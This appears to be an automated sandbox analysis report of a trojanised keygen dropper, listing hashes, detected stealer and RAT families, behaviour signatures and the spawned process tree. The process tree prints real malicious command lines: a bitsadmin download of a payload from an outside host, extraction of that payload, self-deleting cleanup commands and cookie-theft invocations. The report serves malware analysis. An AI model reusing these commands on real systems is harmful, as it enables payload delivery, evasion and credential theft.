Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1800s
  • max time network
    1321s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 20:23

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • Detected facebook phishing page
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 51 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 20 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:364
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2788
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2712
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2424
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2372
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1864
            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
              1⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:2260
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1592
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  3⤵
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2668
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2736
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2804
                • C:\Users\Admin\AppData\Local\Temp\is-D39IQ.tmp\Install.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-D39IQ.tmp\Install.tmp" /SL5="$40086,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:3936
                  • C:\Users\Admin\AppData\Local\Temp\is-90E1R.tmp\Ultra.exe
                    "C:\Users\Admin\AppData\Local\Temp\is-90E1R.tmp\Ultra.exe" /S /UID=burnerch1
                    4⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops file in Program Files directory
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2736
                    • C:\Program Files\Windows Sidebar\TKMRAGWVRI\ultramediaburner.exe
                      "C:\Program Files\Windows Sidebar\TKMRAGWVRI\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4232
                      • C:\Users\Admin\AppData\Local\Temp\is-PQEMT.tmp\ultramediaburner.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-PQEMT.tmp\ultramediaburner.tmp" /SL5="$301A2,281924,62464,C:\Program Files\Windows Sidebar\TKMRAGWVRI\ultramediaburner.exe" /VERYSILENT
                        6⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:4288
                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                          7⤵
                          • Executes dropped EXE
                          PID:4416
                    • C:\Users\Admin\AppData\Local\Temp\44-d96ca-5b4-545a6-b6f4acd66ecfe\Podygefofu.exe
                      "C:\Users\Admin\AppData\Local\Temp\44-d96ca-5b4-545a6-b6f4acd66ecfe\Podygefofu.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4356
                    • C:\Users\Admin\AppData\Local\Temp\62-95a23-a62-bdfaa-b5059440d6d1e\Pubuzhaecezhu.exe
                      "C:\Users\Admin\AppData\Local\Temp\62-95a23-a62-bdfaa-b5059440d6d1e\Pubuzhaecezhu.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4452
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\us0qqukz.jgl\sskiper.exe /s & exit
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:9932
                        • C:\Users\Admin\AppData\Local\Temp\us0qqukz.jgl\sskiper.exe
                          C:\Users\Admin\AppData\Local\Temp\us0qqukz.jgl\sskiper.exe /s
                          7⤵
                          • Executes dropped EXE
                          PID:10128
                          • C:\Users\Admin\AppData\Local\Temp\1574296099.exe
                            C:\Users\Admin\AppData\Local\Temp\1574296099.exe
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5232
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              9⤵
                                PID:9640
                            • C:\Users\Admin\AppData\Local\Temp\369263966.exe
                              C:\Users\Admin\AppData\Local\Temp\369263966.exe
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:8012
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                9⤵
                                  PID:10232
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\us0qqukz.jgl\sskiper.exe & exit
                                8⤵
                                  PID:6244
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 0
                                    9⤵
                                    • Runs ping.exe
                                    PID:6372
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0yidj5gt.5xh\KiffMainE1.exe & exit
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4168
                              • C:\Users\Admin\AppData\Local\Temp\0yidj5gt.5xh\KiffMainE1.exe
                                C:\Users\Admin\AppData\Local\Temp\0yidj5gt.5xh\KiffMainE1.exe
                                7⤵
                                • Executes dropped EXE
                                PID:4312
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dnoraiaw.gy0\001.exe & exit
                              6⤵
                                PID:1860
                                • C:\Users\Admin\AppData\Local\Temp\dnoraiaw.gy0\001.exe
                                  C:\Users\Admin\AppData\Local\Temp\dnoraiaw.gy0\001.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4596
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1yfsyrul.sjl\setup.exe /eufour & exit
                                6⤵
                                  PID:4732
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\la3ysqi0.5uf\installer.exe /qn CAMPAIGN="654" & exit
                                  6⤵
                                    PID:7664
                                    • C:\Users\Admin\AppData\Local\Temp\la3ysqi0.5uf\installer.exe
                                      C:\Users\Admin\AppData\Local\Temp\la3ysqi0.5uf\installer.exe /qn CAMPAIGN="654"
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious use of FindShellTrayWindow
                                      PID:7768
                                      • C:\Windows\SysWOW64\msiexec.exe
                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\la3ysqi0.5uf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\la3ysqi0.5uf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619900819 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                        8⤵
                                          PID:8396
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lomuy2zu.ezh\gpooe.exe & exit
                                      6⤵
                                        PID:7340
                                        • C:\Users\Admin\AppData\Local\Temp\lomuy2zu.ezh\gpooe.exe
                                          C:\Users\Admin\AppData\Local\Temp\lomuy2zu.ezh\gpooe.exe
                                          7⤵
                                          • Executes dropped EXE
                                          PID:7940
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:8196
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:10148
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:7040
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4712
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jvmny0ph.vu1\setup.exe /mixfour & exit
                                        6⤵
                                          PID:8468
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rti1m2yc.qe0\sskiper.exe /s & exit
                                          6⤵
                                            PID:8432
                                            • C:\Users\Admin\AppData\Local\Temp\rti1m2yc.qe0\sskiper.exe
                                              C:\Users\Admin\AppData\Local\Temp\rti1m2yc.qe0\sskiper.exe /s
                                              7⤵
                                              • Executes dropped EXE
                                              PID:8276
                                              • C:\Users\Admin\AppData\Local\Temp\510867898.exe
                                                C:\Users\Admin\AppData\Local\Temp\510867898.exe
                                                8⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:8924
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  9⤵
                                                    PID:5864
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    9⤵
                                                      PID:6420
                                                  • C:\Users\Admin\AppData\Local\Temp\116689003.exe
                                                    C:\Users\Admin\AppData\Local\Temp\116689003.exe
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:6960
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      9⤵
                                                        PID:7924
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\rti1m2yc.qe0\sskiper.exe & exit
                                                      8⤵
                                                        PID:8660
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 0
                                                          9⤵
                                                          • Runs ping.exe
                                                          PID:9116
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x4n35qbz.ypp\google-game.exe & exit
                                                    6⤵
                                                      PID:9384
                                                      • C:\Users\Admin\AppData\Local\Temp\x4n35qbz.ypp\google-game.exe
                                                        C:\Users\Admin\AppData\Local\Temp\x4n35qbz.ypp\google-game.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:9496
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                          8⤵
                                                          • Loads dropped DLL
                                                          PID:8960
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0q5mu4z.yhv\huesaa.exe & exit
                                                      6⤵
                                                        PID:9636
                                                        • C:\Users\Admin\AppData\Local\Temp\t0q5mu4z.yhv\huesaa.exe
                                                          C:\Users\Admin\AppData\Local\Temp\t0q5mu4z.yhv\huesaa.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:9868
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:10096
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5924
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4504
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:9368
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\steatiwt.peg\jvppp.exe & exit
                                                        6⤵
                                                          PID:3900
                                                          • C:\Users\Admin\AppData\Local\Temp\steatiwt.peg\jvppp.exe
                                                            C:\Users\Admin\AppData\Local\Temp\steatiwt.peg\jvppp.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4372
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:6540
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:6044
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:8584
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:8892
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nkbnpp5s.kmu\askinstall39.exe & exit
                                                          6⤵
                                                            PID:4696
                                                            • C:\Users\Admin\AppData\Local\Temp\nkbnpp5s.kmu\askinstall39.exe
                                                              C:\Users\Admin\AppData\Local\Temp\nkbnpp5s.kmu\askinstall39.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5360
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                8⤵
                                                                  PID:6172
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    9⤵
                                                                    • Kills process with taskkill
                                                                    PID:6260
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\frkfd1p1.wfy\setup.exe & exit
                                                              6⤵
                                                                PID:5688
                                                                • C:\Users\Admin\AppData\Local\Temp\frkfd1p1.wfy\setup.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\frkfd1p1.wfy\setup.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:608
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\frkfd1p1.wfy\setup.exe"
                                                                    8⤵
                                                                      PID:5960
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                        9⤵
                                                                        • Runs ping.exe
                                                                        PID:5652
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmbfjjnu.stg\y1.exe & exit
                                                                  6⤵
                                                                    PID:5796
                                                                    • C:\Users\Admin\AppData\Local\Temp\vmbfjjnu.stg\y1.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\vmbfjjnu.stg\y1.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:3904
                                                                      • C:\Users\Admin\AppData\Local\Temp\E6gG93vznq.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\E6gG93vznq.exe"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies system certificate store
                                                                        PID:9912
                                                                        • C:\Users\Admin\AppData\Roaming\1620160150118.exe
                                                                          "C:\Users\Admin\AppData\Roaming\1620160150118.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620160150118.txt"
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          PID:8124
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\E6gG93vznq.exe"
                                                                          9⤵
                                                                            PID:8552
                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                              ping 127.0.0.1 -n 3
                                                                              10⤵
                                                                              • Runs ping.exe
                                                                              PID:8540
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vmbfjjnu.stg\y1.exe"
                                                                          8⤵
                                                                            PID:7932
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /T 10 /NOBREAK
                                                                              9⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:7296
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwa3bvzd.iel\SunLabsPlayer.exe /S & exit
                                                                        6⤵
                                                                          PID:6152
                                                                          • C:\Users\Admin\AppData\Local\Temp\dwa3bvzd.iel\SunLabsPlayer.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\dwa3bvzd.iel\SunLabsPlayer.exe /S
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            PID:6336
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:6524
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:7944
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:6892
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:8784
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:9228
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:9388
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Checks for any installed AV software in registry
                                                                                          PID:4384
                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                          8⤵
                                                                                          • Download via BitsAdmin
                                                                                          PID:3092
                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQIexLbqsL0IakhO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          PID:9824
                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p2dMDO9fcSuQNujK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6028
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5036
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:9652
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:8676
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:7744
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    9⤵
                                                                                                      PID:7664
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiCD5A.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:7440
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KyBSzDrHYF\KyBSzDrHYF.dll" KyBSzDrHYF
                                                                                                      8⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:7564
                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KyBSzDrHYF\KyBSzDrHYF.dll" KyBSzDrHYF
                                                                                                        9⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Drops file in System32 directory
                                                                                                        PID:1416
